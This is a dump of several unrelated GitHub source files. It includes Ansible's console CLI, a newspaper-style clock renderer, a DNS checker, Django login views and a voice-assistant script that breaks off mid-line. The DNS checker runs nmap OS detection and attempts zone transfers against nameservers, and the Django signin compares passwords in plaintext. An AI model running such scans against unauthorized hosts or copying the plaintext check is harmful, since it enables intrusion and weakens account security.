be used and dynamically loaded\n self.modules = self.list_modules()\n for module in self.modules:\n setattr(self, 'do_' + module, lambda arg, module=module: self.default(module + ' ' + arg))\n setattr(self, 'help_' + module, lambda module=module: self.helpdefault(module))\n\n (sshpass, becomepass) = self.ask_passwords()\n self.passwords = {'conn_pass': sshpass, 'become_pass': becomepass}\n\n self.loader, self.inventory, self.variable_manager = self._play_prereqs()\n\n hosts = self.get_host_list(self.inventory, context.CLIARGS['subset'], self.pattern)\n\n self.groups = self.inventory.list_groups()\n self.hosts = [x.name for x in hosts]\n\n # This hack is to work around readline issues on a mac:\n # http://stackoverflow.com/a/7116997/541202\n if 'libedit' in readline.__doc__:\n readline.parse_and_bind(\"bind ^I rl_complete\")\n else:\n readline.parse_and_bind(\"tab: complete\")\n\n histfile = os.path.join(os.path.expanduser(\"~\"), \".ansible-console_history\")\n try:\n readline.read_history_file(histfile)\n except IOError:\n pass\n\n atexit.register(readline.write_history_file, histfile)\n self.set_prompt()\n self.cmdloop()\n\n def __getattr__(self, name):\n ''' handle not found to populate dynamically a module function if module matching name exists '''\n attr = None\n\n if name.startswith('do_'):\n module = name.replace('do_', '')\n if module_loader.find_plugin(module):\n setattr(self, name, lambda arg, module=module: self.default(module + ' ' + arg))\n attr = object.__getattr__(self, name)\n elif name.startswith('help_'):\n module = name.replace('help_', '')\n if module_loader.find_plugin(module):\n setattr(self, name, lambda module=module: self.helpdefault(module))\n attr = object.__getattr__(self, name)\n\n if attr is None:\n raise AttributeError(f\"{self.__class__} does not have a {name} attribute\")\n\n return attr\n\n\ndef main(args=None):\n ConsoleCLI.cli_executor(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible/ansible","sub_path":"lib/ansible/cli/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":21719,"program_lang":"python","lang":"en","doc_type":"code","stars":59303,"dataset":"github-code","pt":"88"} +{"seq_id":"9708357589","text":"from jjrenderer.renderer import *\n\nimport random\nimport importlib\nimport datetime\nimport jjrenderer.jjtimestring as ts\n\nimport pyowm # python open weather map - for local weather in EURRRROPE\n\nimport jjlogger\nlogger = jjlogger.getLogger(__name__)\n\nclass RendererEuroClock(Renderer):\n \n name = \"clock_euro\"\n isclock = True\n menuitem = {\"icon\":\"icon_euro.png\",\"text\":\"Euro\",\"description\":\"One for every country in the union. Eventually...\"}\n\n def doRender(self, screen, **kwargs):\n if len(styles) > 0:\n r = random.randint(0,len(styles)-1) # select a random style\n #r = len(styles)-1\n return styles[r].doRender(self, screen, **kwargs) # pass the render down to the selected style\n else:\n return super().doRender(screen, **kwargs) # use default...\n\n# proposed style list:\n #Austria / Kleine Zeitung\n#Belgium / Gazet Van Antwerpen\n#Bulgaria / Trud\n#Croatia / Novi List\n#Cyprus / Alithia\n#Czechia / Lidove Noviny\n#Denmark / Politiken\n #Estonia / Postimees\n#Finland / Helsingin Sanomat\n #France / Le Monde\n #Germany / Bild\n#Greece / Estia\n#Hungary\n#Ireland\t\n#Italy / Corriere Della Sera\n#Latvia\n#Lithuania\n#Luxembourg\n#Malta\n#Netherlands\n#Poland\n#Portugal\n#Romania\n#Slovakia\n#Slovenia\n#Spain / El Pais\n#Sweden\n\nclass _StyleFrench(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n \n # get time-related text\n t = \"Je ne connais pas l'heure\"\n d = \"Aujourd'hui\"\n if \"timestamp\" in kwargs and kwargs[\"timestamp\"]:\n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"fr\")\n d = ts.GetDateString(kwargs[\"timestamp\"], lang=\"fr\").upper()\n logger.debug(\"time: {0}, date: {1}\".format(t,d))\n \n fill(screen)\n \n draw = ImageDraw.Draw(screen)\n pad = 50\n y = 200\n \n # logo\n logomaxheight = 200\n logomaxwidth = 800\n logo = getImage(\"logo_lemonde\")\n s = 1.0\n if logo.size[1]/logo.size[0] > logomaxheight/logomaxwidth:\n s = logomaxheight/logo.size[1]\n else:\n s = logomaxwidth/logo.size[0]\n logo = logo.resize((int(logo.size[0]*s), int(logo.size[1]*s)),Image.ANTIALIAS)\n screen.paste(logo,(int(screen.size[0]/2 - logo.size[0]/2),y))\n y = y + logo.size[1] + pad\n \n # intermediate bar\n barheight = 130\n screen.paste(0x80, box=(100, y, screen.size[0]-100, y+barheight))\n dividers = 2\n ifont1 = getFont(\"arialnarrow\",42)\n ifont2 = getFont(\"arialnarrowbold\",42)\n itext1 = [\"DERNIÈRES\", \"AFFAIRES\", \"LE MONDE\"]\n itext2 = [\"NOUVELLES\", \"EN COURS\", \"DES LIVRES\"]\n itextheight = ifont1.getsize(\"X\")[1]\n iy1 = int(y + (barheight-itextheight*2)/3)-5\n iy2 = int(y + itextheight + (barheight-itextheight*2)/3*2)\n for i in range(dividers+1):\n x = int(((screen.size[0]-200) / (dividers+1)) * (i)) + 100\n draw.text((x+20,iy1),itext1[i],font=ifont1,fill=0xFF)\n draw.text((x+20,iy2),itext2[i],font=ifont2,fill=0xFF)\n if i > 0:\n screen.paste(0xFF, box=(x-2,y+int(barheight*0.2),x+2,y+int(barheight*0.8)))\n \n y = y + barheight\n \n \n \n # date bar\n datefont = getFont(\"arialnarrowbold\", 36)\n dsz = datefont.getsize(d)\n draw.text((100,y),d,font=datefont,fill=0x00)\n \n pricefont = getFont(\"arialnarrow\", 36)\n p = \"2,50€\"\n draw.text((100+dsz[0]+50,y),p,font=pricefont,fill=0x00)\n \n w = \"WWW.LEMONDE.FR\"\n wsz = pricefont.getsize(w)\n draw.text((screen.size[0]-100-wsz[0],y),w,font=pricefont,fill=0x00)\n \n y = y + dsz[1] # + pad # seems to not need this\n \n # headline\n headlinemaxwidth = screen.size[0] - 200\n headlinefont = getFont(\"arialnarrow\", 150)\n tsz = headlinefont.getsize(t)\n headlineimg = Image.new(\"L\", tsz)\n fill(headlineimg)\n d2 = ImageDraw.Draw(headlineimg)\n d2.text((0,0),t,font=headlinefont,fill=0x00)\n if tsz[0] > headlinemaxwidth:\n headlineimg = headlineimg.resize((headlinemaxwidth, headlineimg.size[1]))\n screen.paste(headlineimg, (int(screen.size[0]/2 - headlineimg.size[0]/2),y))\n return screen\n\nclass _StyleEstonian(RendererEuroClock):\n\n def doRender(self, screen, **kwargs):\n\n bg = getImage(\"bg_postimees\")\n screen.paste(bg)\n draw = ImageDraw.Draw(screen)\n \n # date bar\n d = ts.daystrings_et[kwargs[\"timestamp\"].weekday()].upper()[0] + \", \" + kwargs[\"timestamp\"].strftime(\"%d.%m.%Y\")\n datefont = getFont(\"arial\", 15)\n dsz = datefont.getsize(d)\n draw.text((70,142),d,font=datefont,fill=0xFF)\n \n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"ee\")\n print(t)\n \n # headline\n hl1font = getFont(\"arial\", 18)\n # 255,368\n draw.text((255,365),t,font=hl1font,fill=0x00)\n hl2font = getFont(\"arial\", 50)\n if len(t)>30 and \" \" in t:\n lines = ts.HalfAndHalf(t)\n else:\n lines = [t,]\n y = 480\n for l in lines:\n draw.text((72,y), l, font=hl2font, fill=0x00)\n y += 60\n\n # weather\n weatherfont = getFont(\"arialbold\",15)\n weatherdata = getWeatherByCity(\"Tallinn\", None)\n icon = None\n if weatherdata:\n logger.debug(weatherdata.current)\n icon = getWeatherIcon(weatherdata.current.weather_icon_name).resize((30,30), Image.ANTIALIAS)\n tt = \"{0:.0f}° C\".format(weatherdata.current.temperature()[\"temp\"])\n else:\n tt = \"15° C\" # dummy value if no connection\n if icon: # only paste icon if we got one\n screen.paste(icon, (194,136), icon)\n draw.text((228, 142),tt,font=weatherfont,fill=0xFF)\n return screen\n\nclass _StyleAustrian(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n \n fill(screen)\n\n # box for logo\n w = int(screen.size[0] * 0.80)\n h = int(647 / 1280 * w)\n x0 = int((screen.size[0]-w)/2)\n y0 = int((screen.size[1]-h)/2)\n screen.paste(0x44, box=(x0,y0,x0+w,y0+h))\n\n # text\n th = int(208/647*h)\n tw = int(1123/1280*w)\n tpad = int(57/647*h)\n tx0 = int((screen.size[0]-tw)/2)\n ty0 = y0 + int((h-(2*th)-tpad)/2)\n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"de\")\n lines = ts.HalfAndHalf(t)\n fonts = (getFont(\"arialblack\", 200), getFont(\"arialnarrow\", 200))\n for i in [0,1]:\n l = lines[i].upper()\n tsz = fonts[i].getsize(l)\n yoff = fonts[i].getoffset(l)[1]\n img = Image.new(\"L\", tsz)\n d = ImageDraw.Draw(img)\n d.text((0,0),l,font=fonts[i],fill=0xFF)\n img = img.crop((0, yoff, img.size[0], img.size[1]))\n img = img.resize((tw, th), Image.ANTIALIAS)\n screen.paste(img, (tx0,ty0+i*(th+tpad)), mask=img)\n\n return screen\n\nclass _StyleGerman(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n\n img = Image.new(\"L\", (1000,1100)) # do this at a fixed res then resize at the end\n fill(img, 0x53)\n ns = [kwargs[\"timestamp\"].hour//10, kwargs[\"timestamp\"].hour%10, kwargs[\"timestamp\"].minute//10, kwargs[\"timestamp\"].minute%10]\n mapimg = getImage(\"map_bildfont\")\n x = 115\n y0 = 115\n for n in ns:\n cimg = mapimg.crop((n*170,0,(n+1)*170,mapimg.size[1]))\n img.paste(cimg, (x,y0))\n x += 200\n s = \"unabhängig - überparteilich\".upper()\n font = getFont(\"arialblack\", 80)\n tsz = font.getsize(s)\n ti = Image.new(\"L\", tsz)\n d = ImageDraw.Draw(ti)\n d.text((0,0),s,font=font,fill=0xFF)\n ti = ti.resize((1000-230, 60), Image.ANTIALIAS)\n img.paste(ti, (115, 950), mask=ti)\n \n # blit this onto the screen\n fill(screen)\n h = int(screen.size[1]*0.5)\n w = int(h/img.size[1]*img.size[0])\n x0 = int((screen.size[0]-w)/2)\n y0 = int((screen.size[1]-h)/2)\n screen.paste(img.resize((w,h), Image.ANTIALIAS), (x0,y0))\n \n # date\n s = \"{0},{1}.{2} {3}\".format(ts.daystrings_de[kwargs[\"timestamp\"].weekday()], kwargs[\"timestamp\"].day, ts.monthstrings_de[kwargs[\"timestamp\"].month-1], kwargs[\"timestamp\"].year).upper()\n datefont = getFont(\"arialbold\",100)\n dsz = datefont.getsize(s)\n di = Image.new(\"L\", dsz)\n fill(di)\n d = ImageDraw.Draw(di)\n d.text((0,0),s,font=datefont,fill=0x53)\n di = di.resize((w, int(w/10)))\n screen.paste(di, (x0, y0 - int(di.size[1]*1.3)))\n\n # barcode\n y1 = y0 + h + int(h*0.05)\n barcode = getImage(\"barcode\")\n screen.paste(barcode, (x0+w-barcode.size[0], y1))\n\n # price\n draw = ImageDraw.Draw(screen)\n pricefont = getFont(\"arialbold\", 20)\n draw.text((x0, y1), \"1.00 EURO 44/8\", font=pricefont, fill=0x00)\n draw.text((x0, y1 + int(h/10)), \"www.bild.de\", font=pricefont, fill=0x00)\n\n return screen\n\nclass _StyleSpanish(RendererEuroClock):\n def doRender(self, screen, **kwargs): \n \n # textcolor\n textcolor = ImageColor.getcolor(\"black\", screen.mode)\n \n # background\n bg = getImage(\"bg_elpais\")\n screen.paste(bg)\n\n # draw obj\n draw = ImageDraw.Draw(screen)\n \n # date line\n p = [347,257]\n dstring = ts.GetDateString(kwargs[\"timestamp\"], lang=\"es\", includeday=False).upper()\n dstring = dstring + \" | Numero 12345 | EDICION MADRID | \"\n daystr = ts.daystrings_es[kwargs[\"timestamp\"].weekday()].title()\n dfont1 = getFont(\"arialbold\", 16)\n dfont2 = getFont(\"arial\", 16)\n tsz = dfont1.getsize(daystr)\n draw.text(p, daystr, font=dfont1, fill=textcolor)\n p[0] = p[0] + tsz[0] + 5\n draw.text(p, dstring, font=dfont2, fill=textcolor)\n tsz = dfont2.getsize(dstring)\n p[0] = p[0] + tsz[0] + 5\n draw.text(p, \"Precio: 2,80 EUR\", font=dfont1, fill=textcolor)\n\n # headline\n y = 410\n dy = 110\n hfont = getFont(\"timesbold\", 100)\n htext = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"es\")\n htext_split = ts.HalfAndHalf(htext)\n for l in htext_split:\n x = int((screen.size[0] - hfont.getsize(l)[0])/2)\n draw.text((x,y), l, font=hfont, fill=textcolor)\n y = y + dy\n \n return screen\n\n\n\n# automated luxury space communist style collection\n\nstyles = []\nl = locals().copy()\nfor name, obj in l.items():\n if name.startswith(\"_Style\"):\n styles.append(obj)\nlogger.debug(\"euro styles loaded: \" + str(styles))","repo_name":"grob6000/JJClock","sub_path":"jjrenderer/euro.py","file_name":"euro.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"25913049539","text":"import platform\nimport subprocess\nimport dns.resolver\nimport dns.reversename\nimport dns.zone\nimport dns.query\nimport dns.message\nimport dns.dnssec\nimport socket\nimport nmap3\nimport simplejson as json\nfrom pygments import highlight, lexers, formatters\nimport dns.rdatatype\nimport dns.flags\n\nclass bcolor:\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n WHITE = '\\033[97m'\n\nclass NmapScan:\n state = \"\"\n os = \"\"\n def __init__(self, ip):\n n = nmap3.Nmap()\n result = n.nmap_os_detection(ip)\n for data in result:\n self.os = data['cpe']\n\nclass DnsChecker:\n domain = \"\"\n ip = \"\"\n ns = []\n txt = []\n soa = \"\"\n mx = \"\"\n timeout = 5.0\n def banner(self):\n flag = \"\"\"\n =======================================================================================================\n * ******** ****** ** ** ** ** ****** ** '``' *\n * ** ** ** ** ** ** ** ** ** ** ** '- framet'?'' *\n * ** ** ** ** ** ** ** ** ** ** ** '' '' *\n * ** ** ** ** ** ** ** ** ********* ** *\n * ** ** ** *** ** ** ** ** ** ** *\n * ** ** ** ** ** ** ***** ** ** ** ** *\n * ***** ****** ** ** *** ** ** *********** *\n =======================================================================================================\n \"\"\"\n print(bcolor.GREEN + flag)\n\n def __init__(self, domain):\n self.domain = domain\n self.get_ip()\n self.get_ns()\n self.get_txt()\n self.get_soa()\n self.get_mx()\n self.banner()\n\n def get_ip(self):\n try:\n result = dns.resolver.resolve(self.domain, 'A')\n for data in result:\n self.ip = data.to_text()\n except Exception as e:\n print( \"No se pudo resolver la ip del dominio : \" + self.domain)\n\n def get_ns(self):\n try:\n result = dns.resolver.resolve(self.domain, 'NS')\n for data in result:\n self.ns.append(data.to_text())\n self.ns.sort()\n except Exception as e:\n print( \"No se pudo resolver los names server del dominio : \" + self.domain)\n\n def get_txt(self):\n try:\n result = dns.resolver.resolve(self.domain, 'TXT')\n for data in result:\n self.txt.append(data.to_text())\n except Exception as e:\n print (\"No se puede resolver TXT record del domain : \" + self.domain)\n\n def get_soa(self):\n try:\n result = dns.resolver.resolve(self.domain, 'SOA')\n for data in result:\n self.soa = data.to_text()\n except Exception as e:\n print( \"No se pudo resolver SOA (Start of authority) del dominio : \" + self.domain)\n\n def get_mx(self):\n try:\n result = dns.resolver.resolve(self.domain, 'SOA')\n for data in result:\n self.mx = data.to_text()\n except Exception as e:\n print( \"No se pudo resolver MX (Mail Server for accepting email messages) del dominio : \" + self.domain)\n\n def get_general_info(self):\n try:\n print(bcolor.RED + \"********** Información General *******************\" + bcolor.GREEN)\n print(bcolor.YELLOW + \"Dominio : \" + bcolor.WHITE + self.domain)\n print(bcolor.YELLOW + \"IP : \" + bcolor.WHITE + self.ip)\n for index in self.ns:\n print(bcolor.YELLOW + \"NameServer: \" + bcolor.WHITE + index)\n for index in self.txt:\n print(bcolor.YELLOW + \"TXT record: \" + bcolor.WHITE + index)\n print(bcolor.YELLOW + \"SOA (Start of authority) : \" + bcolor.WHITE + self.soa)\n print(bcolor.YELLOW + \"MX (Mail Server): \" + bcolor.WHITE + self.mx)\n\n except Exception as e:\n print(e)\n\n def query_response_time(self):\n answer = \"\"\n try:\n query = dns.message.make_query(self.domain, dns.rdatatype.DS, dns.rdataclass.IN)\n query.flags += dns.flags.CD\n query.use_edns(edns=True, payload=4096)\n print(bcolor.YELLOW + \"DNSSEC : \" + str(query.want_dnssec(True)))\n\n print(bcolor.RED + \"************Validación de disponibilidad de server DNS **************\" + bcolor.GREEN)\n i=1\n for data in self.ns:\n print(bcolor.RED + \"************ DNS Sever # {0} **************\".format(i) + bcolor.GREEN)\n answer = dns.query.udp(query, socket.gethostbyname(data), self.timeout)\n print(bcolor.YELLOW + \"Server: \" + bcolor.WHITE + format(data) + bcolor.YELLOW + \" IP : \" + bcolor.WHITE + socket.gethostbyname(data) + bcolor.YELLOW + \" Estado : \" + bcolor.WHITE + \"Operativo\" )\n print(bcolor.YELLOW + \"Timeout : \" + bcolor.WHITE)\n self.ping(socket.gethostbyname(data))\n print(bcolor.YELLOW + \"Tamaño de carga util EDNS (payload) : \" + bcolor.WHITE + str(answer.payload))\n print(bcolor.YELLOW + \"Flags del mensaje: \" + bcolor.WHITE + str(answer.flags))\n scan = NmapScan(str(socket.gethostbyname(data)))\n print(\"Sistema Operativo : \" + scan.os)\n self.transfer_zone(socket.gethostbyname(data))\n i += 1\n except dns.exception.Timeout:\n print(bcolor.RED + \" Advertencia!! -> Tiempo de espera superado al tratar de llegar al servidor DNS en {0} segundos \".format(self.timeout))\n except Exception as e:\n raise\n\n def print_data(self):\n self.get_general_info()\n self.query_response_time()\n\n def transfer_zone(self, ip):\n try:\n print (bcolor.RED + \"######## Zones Transference #######################\" + bcolor.GREEN)\n #z = dns.zone.from_xfr(dns.query.xfr(\"81.4.108.41\",\"zonetransfer.me\"))\n zone = dns.zone.from_xfr(dns.query.xfr(ip,self.domain))\n names = zone.nodes.keys()\n print (\"Zona de Transferencia Activada....... A continuación la lista encontrada\")\n for n in names:\n print(zone[n].to_text(n))\n except dns.xfr.TransferError:\n print (\"Transferencia de Zona para el dominio {0} no esta autorizada \".format(self.domain))\n\n def ping(self, ip):\n param = '-n' if platform.system().lower()=='windows' else '-c'\n command = ['ping', param, '1', ip]\n return subprocess.call(command) == 0\n\nif __name__ == '__main__':\n #domain = \"prueba.com\"\n domain = input (\"Ingrese el dominio a evaluar: \")\n try:\n obj = DnsChecker(domain)\n obj.print_data()\n except socket.gaierror:\n print (bcolor.RED + \" Advertencia: Dominio no existe !!\")\n","repo_name":"JoynalFrametOlimpo/dns_checker","sub_path":"dns_checker.py","file_name":"dns_checker.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"19432667374","text":"from dataclasses import field\nimport json\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\n\nfrom .models import User, Survey, User_kind_code\n\nfrom django.db import connection\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.hashers import check_password\nfrom django.shortcuts import get_object_or_404\nfrom django.http.response import JsonResponse\nfrom django.core import serializers\n\n\nfrom apps.user.serializer import UserSerializer\n\n# Create your views here.\n# 회원가입 \n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef signup(request):\n user = UserSerializer(data=request.data)\n reply_list= request.data['reply_list']\n\n if user.is_valid():\n\n user_k = cal_reply(reply_list).kind_code\n user.save()\n \n user_id = user['user_id'].value\n User.objects.filter(user_id = user_id).update(user_kind = user_k)\n kind_n = User_kind_code.objects.get(kind_code = user_k)\n kind = kind_n.kind_name\n\n id = User.objects.get(user_id = user_id) # user_no\n Survey.objects.create(user_no = id, reply_list = reply_list)\n return JsonResponse({'result' : \"success\", 'user_kind': [user_k, kind]})\n return JsonResponse({'result' : \"fail\"})\n #return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n\ndef cal_reply(reply_list):\n ey=0\n en=0\n oy=0\n on=0\n for index, val in enumerate(reply_list):\n print(index, val)\n # 짝수\n if((index+1)%2==0):\n if(val == 'Y'): \n ey += 1\n else: \n en +=1\n # 홀수\n else:\n if(val == 'Y'): \n oy += 1\n else: \n on +=1\n\n \n # if(oy>on):\n # if(ey>en):\n # user_k = User_kind_code.objects.get(kind_code = 'K1')\n # # us.update(user_kind= user_k)\n # else: \n # print(\"here\")\n # user_k = User_kind_code.objects.get(kind_code = 'K2')\n # # us.update(user_kind =user_k)\n # else:\n # if(ey>en):\n # user_k = User_kind_code.objects.get(kind_code = 'K3')\n # # us.update(user_kind=user_k)\n # else:\n # # us.update(user_kind=user_k)\n \n if(oy>on):\n if(ey>en):\n kind_code = 'K1'\n else: \n kind_code = 'K2'\n else:\n if(ey>en):\n kind_code = 'K3'\n else:\n kind_code = 'K4'\n \n user_k = User_kind_code.objects.get(kind_code = kind_code)\n\n return user_k\n\n\n# 아이디 중복검사 \n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef checkid(request, id):\n try:\n id = User.objects.get(user_id = id) \n except :\n id = None \n if id is None :\n duplicate =\"success\"\n else : \n duplicate = \"fail\"\n context= {'result' : duplicate}\n return JsonResponse(context)\n\n\n# 로그인\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef signin(request):\n reqData=request.data\n user_id=reqData['user_id']\n password= reqData['password']\n print(\"id : \",user_id)\n row = serializers.serialize(\"json\", User.objects.filter(user_id=user_id), fields = {\"nickname\", \"password\"})\n print(row)\n size= len(json.loads(row))\n if(size == 0):\n login =\"fail\"\n nick =None\n user_no=None\n else : \n u_no = json.loads(row)[0]['pk']\n password_n = json.loads(row)[0]['fields']['password']\n nickname_n = json.loads(row)[0]['fields']['nickname']\n if(password != password_n):\n login = \"fail\"\n nick = None\n user_no=None\n else:\n login = \"success\"\n nick =nickname_n\n user_no=u_no\n context= {'result' : login ,\n 'nickname' : nick,\n 'user_no' : user_no }\n return JsonResponse(context)\n\n \n\n \n","repo_name":"hh2728/WouldU","sub_path":"backend/apps/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"39398659755","text":"import speech_recognition as sr # recognise speech\r\nimport playsound # to play an audio file\r\nfrom gtts import gTTS # google text to speech\r\nimport random\r\nimport time\r\nfrom time import ctime # get time details\r\nimport webbrowser # open browser\r\nimport yfinance as yf # to fetch financial data\r\nimport ssl\r\nimport certifi\r\nimport time\r\nimport os # to remove created audio files\r\nimport subprocess\r\nfrom os import sys\r\nimport wikipedia\r\nfrom pynput.mouse import Button, Controller\r\nfrom pynput import keyboard\r\nimport numpy\r\n\r\nbrowser = \"chrome.exe\"\r\n\r\n\r\n#declearation of mouse and keyboard\r\nmouse = Controller()\r\nkey = keyboard.Controller()\r\n\r\n\r\nclass person:\r\n name = ''\r\n\r\n def setName(self, name):\r\n self.name = name\r\n\r\ndef there_exists(terms):\r\n for term in terms:\r\n if term in voice_data:\r\n return True\r\n\r\n\r\n\r\nr = sr.Recognizer() # initialise a recogniser\r\n# listen for audio and convert it to text:\r\n\r\n\r\ndef record_audio(ask=False):\r\n with sr.Microphone() as source: # microphone as source\r\n if ask:\r\n speak(ask)\r\n audio = r.listen(source) # listen for the audio via source\r\n voice_data = ''\r\n try:\r\n voice_data = r.recognize_google(audio) # convert audio to text\r\n except sr.UnknownValueError: # error: recognizer does not understand\r\n speak('what should i do')\r\n except sr.RequestError:\r\n # error: recognizer is not connected\r\n speak('Sorry, the service is down')\r\n print(f\">> {voice_data.lower()}\") # print what user said\r\n return voice_data.lower()\r\n\r\n# get string and make a audio file to be played\r\n\r\ndef speak(audio_string):\r\n tts = gTTS(text=audio_string, lang='en') # text to speech(voice)\r\n r = random.randint(1, 20000000)\r\n audio_file = 'audio' + str(r) + '.mp3'\r\n tts.save(audio_file) # save as mp3\r\n playsound.playsound(audio_file) # play the audio file\r\n print(f\"Alpha: {audio_string}\") # print what app said\r\n os.remove(audio_file) # remove audio file\r\n\r\n\r\n\r\ndef respond(voice_data):\r\n\r\n#manners\r\n if there_exists([\"wait for\",\"weight for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n speak(f'Ok sir i will not interuppting you for {search_term} minuits')\r\n time.sleep(int(search_term)*60)\r\n speak(f'Sir, are u free now?')\r\n \r\n if there_exists([\"no\"]) and ([\"more\"]):\r\n search_term = voice_data.split(\"more\")[-1]\r\n speak(f'Ok sir i will not interuppting you for {search_term} minuits')\r\n time.sleep(int(search_term)*60)\r\n speak(f'Sir, are u free now?')\r\n \r\n if there_exists([\"yes\"]) and ([\"am\"]) and ([\"i\"]) and ([\"free\"]):\r\n speak(f'ok sir, always at your service')\r\n\r\n\r\n # introoooooooooooooo.................................................????????>>>>>>>>>>>>>>>>>>>>>\r\n # 0: Introduction\r\n if there_exists([\"alpha\"]):\r\n speak(\"Yes Sir, i'm your personal P.C Assistent!. Alpha....... . Checking for System Being online...... . All set!.... Good to go sir!....\")\r\n\r\n # 0: vertion\r\n if there_exists([\"vertion\", \"version\"]):\r\n speak(\"currently i'm Alpha 2.0. Later vertions are Alpha! Alpha 1.0! Alpha 1.1.0! Alpha 1.2!\")\r\n\r\n # 0: vertion\r\n if there_exists([\"introduction\", \"intro\"]):\r\n speak(\"currently i'm Alpha 2.0. Later vertions are Alpha! work as a chat bot! Alpha 1.0! modified youtube search. Alpha 1.1.0! modified google search. Alpha 1.2!modified tiem and os capability\")\r\n\r\n # 1: greeting\r\n if there_exists(['hey', 'hay', 'hi', 'hello']):\r\n greetings = [f\"hey, how can I help you {person_obj.name}\", f\"hey, what's up? {person_obj.name}\",\r\n f\"I'm listening {person_obj.name}\", f\"how can I help you? {person_obj.name}\", f\"hello {person_obj.name}\"]\r\n greet = greetings[random.randint(0, len(greetings)-1)]\r\n speak(greet)\r\n\r\n # 2: name\r\n if there_exists([\"what is your name\", \"what's your name\", \"tell me your name\", \"Who are you\"]):\r\n if person_obj.name:\r\n speak(\"my name is Alpha. Version 2.OO !\")\r\n else:\r\n speak(\"my name is Alpha.\")\r\n\r\n if there_exists([\"my name is\"]):\r\n person_name = voice_data.split(\"is\")[-1].strip()\r\n speak(f\"okay, i will remember that {person_name}\")\r\n person_obj.setName(person_name) # remember name in person object\r\n\r\n if there_exists([\"whta is my name\"]):\r\n person_name = voice_data.split(\"is\")[-1].strip()\r\n speak(f\"Sir, your name is {person_name}\")\r\n person_obj.setName(person_name)\r\n\r\n # 3: greeting\r\n if there_exists([\"how are you\", \"how are you doing\"]):\r\n speak(f\"I'm very well, thanks for asking {person_obj.name}\")\r\n\r\n # introoooooooooooooo.................................................????????>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 4: time\r\n if there_exists([\"what's the time\", \"tell me the time\", \"what time is it\"]):\r\n time1 = ctime().split(\" \")[3].split(\":\")[0:2]\r\n if time1[0] == \"00\":\r\n hours = '12'\r\n else:\r\n hours = time1[0]\r\n minutes = time1[1]\r\n time1 = f'{hours} {minutes}'\r\n speak(time1)\r\n\r\n # 5: search google\r\n if there_exists([\"search for\"]) and 'youtube' not in voice_data:\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = f\"https://google.com/search?q={search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(f'Here is what I found for {search_term} on google')\r\n\r\n # 6.1: search youtube\r\n if there_exists([\"play my song\"]):\r\n webbrowser.get().open_new_tab(\r\n \"https://www.youtube.com/watch?v=mRvKlUcD8vs&list=RDmRvKlUcD8vs&start_radio=1\")\r\n speak(f'Playing songs from youtube!')\r\n\r\n # 6.2: Open Facebook\r\n if there_exists([\"open facebook\"]):\r\n webbrowser.get().open_new_tab(\"https://www.facebook.com/\")\r\n speak(f'Opened FaceBook for you Sir')\r\n\r\n # 6.2: Open WhatsAPP\r\n if there_exists([\"open whatsapp\"]):\r\n webbrowser.get().open_new_tab(\"https://web.whatsapp.com/\")\r\n speak(f'Opened WhatsApp for you Sir')\r\n\r\n # 6.3: Open Gmail\r\n if there_exists([\"open my gmail\"]):\r\n webbrowser.get().open_new_tab(\"https://mail.google.com/mail/u/0/#inbox\")\r\n speak(f'Opened Your Gmail for you Sir')\r\n\r\n # 6.3: Open Dad Gmail\r\n if there_exists([\"open dad gmail\"]):\r\n webbrowser.get().open_new_tab(\"https://mail.google.com/mail/u/1/#inbox\")\r\n speak(f'Opened Dads Gmail for you Sir')\r\n\r\n # 6.3: Open Javatpoint\r\n if there_exists([\"open java t point\"]):\r\n webbrowser.get().open_new_tab(\"https://www.javatpoint.com/\")\r\n speak(f'Opened javatpoint for you Sir')\r\n\r\n # 6.3: Open Dad Gmail\r\n if there_exists([\"open tutorialspoint\"]):\r\n webbrowser.get().open_new_tab(\"https://www.tutorialspoint.com/index.htm\")\r\n speak(f'Opened tutorialspoint for you Sir')\r\n\r\n # 6.3: Open greeksforgreeks Gmail\r\n if there_exists([\"open greeks for greeks\", \"open greeksforgreeks\", \"open greekforgreek\", \"greekforgreeks\"]):\r\n webbrowser.get().open_new_tab(\"https://www.geeksforgeeks.org/\")\r\n speak(f'Opened geeksforgeeks for you Sir')\r\n\r\n # 7: search wikipedia\r\n if there_exists([\"wikipedia for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = f\"https://en.wikipedia.org/wiki/{search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(wikipedia.summary(search_term, sentences=2))\r\n\r\n # 8 Controlling Youtube........................................................................?>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 6: search youtube\r\n if there_exists([\"open youtube for\"]):\r\n search_term = voice_data.split(\"for\")[-1]\r\n url = f\"https://www.youtube.com/results?search_query={search_term}\"\r\n webbrowser.get().open_new_tab(url)\r\n speak(f'Here is what I found for {search_term} on youtube')\r\n\r\n # 8.1 Youtube next video\r\n if there_exists([\"next video\"]):\r\n mouse.position = (202, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Skip to Next 